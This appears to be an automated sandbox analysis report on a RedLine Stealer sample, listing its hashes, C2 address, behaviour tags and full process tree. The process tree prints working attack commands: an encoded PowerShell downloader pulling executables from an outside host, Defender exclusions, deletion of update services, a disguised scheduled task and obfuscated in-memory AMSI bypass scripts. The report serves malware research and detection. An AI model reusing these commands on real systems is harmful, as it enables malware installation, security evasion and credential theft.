Analysis
-
max time kernel
43s -
max time network
89s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
03-01-2023 00:41
General
-
Target
b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe
-
Size
119KB
-
MD5
d9a2313ebd1f9d41687e127028bc230e
-
SHA1
b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1
-
SHA256
a5d8eac92699a2e8870775b0eb150bb3fdedf4e86f6b0a26a122ad5f7e9fd3c2
-
SHA512
4ee00a77199e82d63967f9731a5dd101f2dcec52584337dff306c2d5b71dfa4d83ac473617da0b022d301f8878b5cd835b18a35603fbe9dd7682064dc30264be
-
SSDEEP
3072:EcJw0ADKnZ1bEGSzLu1XlEWb3MeUn3PAngc13Aa99sXcc:/W3IZ1bgQlExeUcN99sXcc
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
1
C2
107.182.129.73:21733
Attributes
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 54 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7c4b187d-5741-46b1-a6a6-fca0b7b13e7c}2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe"C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 4926⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 2523⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 2723⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 2803⤵
- Program crash
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2420 -ip 24201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2420 -ip 24201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2420 -ip 24201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5040 -ip 50401⤵
-
C:\Windows\system32\WerFaultSecure.exe"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 1924 -i 1924 -h 184 -j 468 -s 532 -d 34601⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:axgxfHqYJyQF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DLTMsDOPitMxWW,[Parameter(Position=1)][Type]$xuzqGJmNKf)$rDXDdMQOfIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+'l'+'e'+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+'a'+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+'C'+'la'+'s'+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](83)+''+'e'+'a'+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+'C'+'l'+'as'+'s'+'',[MulticastDelegate]);$rDXDdMQOfIs.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+'m'+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic',[Reflection.CallingConventions]::Standard,$DLTMsDOPitMxWW).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+'a'+[Char](103)+''+[Char](101)+'d');$rDXDdMQOfIs.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+'ewS'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$xuzqGJmNKf,$DLTMsDOPitMxWW).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rDXDdMQOfIs.CreateType();}$phIbDoxjBNQZq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n32'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'p'+''+[Char](104)+'I'+[Char](98)+''+[Char](68)+''+[Char](111)+''+[Char](120)+''+'j'+''+[Char](66)+''+'N'+'Q'+[Char](90)+''+'q'+'');$jQndZzwPhUtocb=$phIbDoxjBNQZq.GetMethod(''+[Char](106)+''+'Q'+''+[Char](110)+''+'d'+'Zz'+[Char](119)+''+'P'+'h'+[Char](85)+'t'+[Char](111)+'c'+'b'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qxqRBaiukhwFIdBeiPy=axgxfHqYJyQF @([String])([IntPtr]);$PEWHlqaszbMFffKdzTFFrI=axgxfHqYJyQF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XyOlpaIFmnr=$phIbDoxjBNQZq.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+'32'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$ndvWkiSmlgpgij=$jQndZzwPhUtocb.Invoke($Null,@([Object]$XyOlpaIFmnr,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$wzZnJpMpLIgNJPVwJ=$jQndZzwPhUtocb.Invoke($Null,@([Object]$XyOlpaIFmnr,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tual'+'P'+''+'r'+''+'o'+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$nfUhlmW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndvWkiSmlgpgij,$qxqRBaiukhwFIdBeiPy).Invoke(''+'a'+'ms'+'i'+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$zraiQkBxHNOwXnkBt=$jQndZzwPhUtocb.Invoke($Null,@([Object]$nfUhlmW,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'Bu'+[Char](102)+'f'+'e'+'r')));$wGgibvyfAX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wzZnJpMpLIgNJPVwJ,$PEWHlqaszbMFffKdzTFFrI).Invoke($zraiQkBxHNOwXnkBt,[uint32]8,4,[ref]$wGgibvyfAX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$zraiQkBxHNOwXnkBt,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wzZnJpMpLIgNJPVwJ,$PEWHlqaszbMFffKdzTFFrI).Invoke($zraiQkBxHNOwXnkBt,[uint32]8,0x20,[ref]$wGgibvyfAX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'al'+[Char](101)+'rs'+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnHffVrxiLMf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dVafhBXpTviUqJ,[Parameter(Position=1)][Type]$JxHlrKAILb)$aAfyWvEjOsJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+'e'+'Ty'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+'c'+',S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'A'+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$aAfyWvEjOsJ.DefineConstructor(''+[Char](82)+'TS'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$dVafhBXpTviUqJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'Man'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$aAfyWvEjOsJ.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'ke',''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+'w'+'S'+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$JxHlrKAILb,$dVafhBXpTviUqJ).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $aAfyWvEjOsJ.CreateType();}$kxzabZLQRAhjw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'kx'+'z'+''+[Char](97)+''+[Char](98)+''+[Char](90)+''+'L'+''+'Q'+''+'R'+''+[Char](65)+''+[Char](104)+''+[Char](106)+''+'w'+'');$pRKHJThwAlMUgS=$kxzabZLQRAhjw.GetMethod('pRK'+[Char](72)+''+'J'+'Th'+[Char](119)+''+'A'+''+[Char](108)+'MU'+[Char](103)+''+[Char](83)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ORVRCFDROUQTIrwTSaL=TnHffVrxiLMf @([String])([IntPtr]);$AczaECbfKdkEWHWUFmwcMO=TnHffVrxiLMf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tdPFHKHJWGE=$kxzabZLQRAhjw.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+'a'+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$HtPMOAaNZyPWSF=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$tdPFHKHJWGE,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+'ib'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$ndqHzyqstXnVqbnSC=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$tdPFHKHJWGE,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$mwAlDbS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HtPMOAaNZyPWSF,$ORVRCFDROUQTIrwTSaL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$DprkdrtzbsWNtMqrP=$pRKHJThwAlMUgS.Invoke($Null,@([Object]$mwAlDbS,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$kkwqrPffOy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndqHzyqstXnVqbnSC,$AczaECbfKdkEWHWUFmwcMO).Invoke($DprkdrtzbsWNtMqrP,[uint32]8,4,[ref]$kkwqrPffOy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DprkdrtzbsWNtMqrP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ndqHzyqstXnVqbnSC,$AczaECbfKdkEWHWUFmwcMO).Invoke($DprkdrtzbsWNtMqrP,[uint32]8,0x20,[ref]$kkwqrPffOy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[